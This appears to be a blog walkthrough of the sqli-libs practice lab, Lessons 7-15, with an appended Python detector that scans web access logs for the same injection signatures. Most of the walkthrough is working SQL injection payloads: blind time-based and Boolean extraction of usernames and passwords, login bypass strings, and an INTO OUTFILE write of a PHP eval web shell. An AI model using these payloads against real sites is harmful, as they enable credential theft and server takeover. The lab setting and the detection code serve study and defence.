"The north wind rolls over the ground and the white grass breaks; in the Hu lands snow already flies in August." Today the temperature is really low and my head is a lot clearer; after reworking the plan in the morning, things went more smoothly. Below begins my walk through Old Black's sqli-libs exercises!!
Less 7:
Analysis: look at what the page displays and guess what should be injected into the file.
TRY:
S1: Test the closing condition: 1' fails, 1" fails, 1') fails, 1") fails, 1')) OK! How do you test whether the input is closed? There are many methods, for example the following procedure:
s1.1 http://192.168.162.135/sqli-libs/Less-7?id=1') order by 1--+ is used to determine the number of fields, as shown here.
Incrementing the order by value in the s1.1 URL up to 4 produces an error, which proves the table has three fields; since the injected order by statement is accepted, ') closes the preceding content.
S2: The page gives no echo, so the time-based injection method can be used. In short, add if(expr1, expr2, expr3) to the injected statement: expr2 holds a sleep() that delays the page's response, and expr1 holds the guess about the database contents. A correct guess makes the page respond slowly, a wrong guess makes it respond immediately, so the length of the response time represents true or false.
Without going into detail, the answer: http://192.168.162.135/sqli-libs/Less-7?id=1')) and if((ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10), (bis)))=97, sleep(5), NULL)--+
Explanation: 97 is the ASCII value of 'a', so the condition holds if the 4th character is 'a'. Of course, at the start you do not know which character Old Black used, so first combine the two methods: narrow the range with comparisons, then pin down the exact value:
1. Test ? < 127, then keep halving the range (? < ..., ? < ...) until ? < 104, ? < 98, and finally = 97.
S3: But Old Black started by saying to use files. Yes, many of the answers online do it that way, and I learned a bit of it too; the procedure is as follows:
s3.1: Determine whether there is write permission. Write permission can be judged with
http://192.168.162.135/sqli-libs/Less-7?id=1') and (select count(*) from mysql.user)>0--+   // read and write permission exists if the page returns normally
s3.2: Write the injected content to a file
http://192.168.162.135/sqli-libs/Less-7?id=1')) union select 1, '<?php eval($_post["123"]);?>', 3 into outfile '/var/www/html/sqli-libs/test.php'--+
Supposedly a test.php file should then appear under /var/www/html/sqli-libs on the system. Unfortunately, on my Ubuntu it did not, and I had no success. I do not know whether you have succeeded? If anyone knows what Old Black wrote wrong, please point it out, thank you, hehe hehe!
Less 8:
Boolean-based table guessing; id=1' needs to be closed.
Answer: http://192.168.162.135/sqli-libs/Less-8?id=1' and (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10)))=97--+   Boolean: judge the character's ASCII value; binary search makes it fast.
Less 9:
Time-based guessing of the table and its length; id=1' needs to be closed.
Answer: http://192.168.162.135/sqli-libs/Less-9?id=1' and if((ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10)))=97, sleep(5), null)--+   Time-based judgment: the page's response time takes the place of the Boolean result.
Less 10:
Same as Less 9.
Answer: http://192.168.162.135/sqli-libs/Less-10?id=1" and if((ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10)))=97, sleep(5), NULL)--+
Less 11:
Unlike the previous ones; take a look at the picture.
You enter a username and password to log into the system. This can also be SQL-injected; the approach is the same, find the closing method. After trying, ' can close it.
Answer:
Login: username=a && password=b' or '1'='1
Injection: 1' union select 1,database()#  :  1
Less 12:
Answer: similar to Less 11
Injection: 1' union select 1,database()#  :  1
Less 13:
Login: a:b') or 1=1
Inject: a:b') or (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10)))=97#   (Boolean injection)
Less 14:
Login: a:b" or 1=1#
Inject: a:b" or (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10)))=97#   (Boolean injection)
Less 15:
Login: a:b' or 1=1#
Inject: a:b' or (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10)))=97#   (Boolean injection)
Summary: basically, first find the closing method, then find the echo channel (direct: the page displays the data directly, or an error message shows it; indirect: Boolean judgment, time judgment), and finally construct the statements that collect the information you want. OK!
[20171030, early morning] sqli-libs Less 7-15 exercises
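Seen from the defender's side, every step in the summary above leaves a trace in the web server's access log. The following Python detector is an added example, not code from the original post or from sqli-libs: it URL-decodes the request target of constructed access-log lines modelled on the Less 7-15 payloads and flags the signatures those steps leave (closure probes, ORDER BY counting, ascii(substr(...)) guessing, sleep() delays, INTO OUTFILE). The combined log format, the signature names and the repetition threshold are assumptions of this example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Signatures distilled from the Less 7-15 payloads above (closure probes, ORDER BY
# counting, ASCII/SUBSTR guessing, SLEEP delays, INTO OUTFILE); names are this example's own.
SIGNATURES = {
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "blind_char": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "time_delay": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "closure_probe": re.compile(r"['\"]\)*\s*(?:and|or|union|order)\b|--\s*$", re.I),
}
# Combined log format (assumed): client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3} \S+')
# Constructed sample log: a benign client plus one that counts columns, tries a
# file write, then runs nine time-based character guesses (one per request).
SAMPLE_LOG = [
    '192.168.162.50 - - [30/Oct/2017:08:00:01 +0800] "GET /sqli-libs/Less-7?id=1 HTTP/1.1" 200 733',
    '192.168.162.1 - - [30/Oct/2017:08:01:10 +0800] "GET /sqli-libs/Less-7?id=1%27%29%29+order+by+4--+ HTTP/1.1" 200 733',
    '192.168.162.1 - - [30/Oct/2017:08:02:00 +0800] "GET /sqli-libs/Less-7?id=1%27%29%29+union+select+1,%27x%27,3+into+outfile+%27/tmp/t.txt%27--+ HTTP/1.1" 200 733',
] + [
    f'192.168.162.1 - - [30/Oct/2017:08:03:{i:02d} +0800] "GET /sqli-libs/Less-9?id=1%27+and+if%28ascii%28substr%28database%28%29,1,1%29%29%3E{64 + i},sleep%285%29,null%29--+ HTTP/1.1" 200 733'
    for i in range(9)
]

def classify_target(target):
    # Decode %xx and '+' first: the payloads only read as SQL after decoding.
    decoded = unquote_plus(target)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan(lines):
    # Count signature hits per client IP; lines that do not parse are skipped.
    hits = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for tag in classify_target(m["target"]):
                hits[m["ip"]][tag] += 1
    return hits

def suspicious_clients(hits, min_blind_probes=8):
    """Blind injection costs one request per guessed character, so repetition is the signal."""
    flagged = {}
    for ip, c in hits.items():
        reasons = [r for r, hit in (
            ("file write attempt", c["file_write"] > 0),
            ("union-based extraction", c["union_select"] > 0),
            ("repeated blind probes", max(c["blind_char"], c["time_delay"]) >= min_blind_probes),
        ) if hit]
        if reasons:
            flagged[ip] = reasons
    return flagged
```

For the login forms of Less 11-15 the payload travels in the POST body, which a standard access log does not record, so those need request-body logging or a WAF in front of the application; treat these matches as hunting leads to confirm against the application, not as proof on their own.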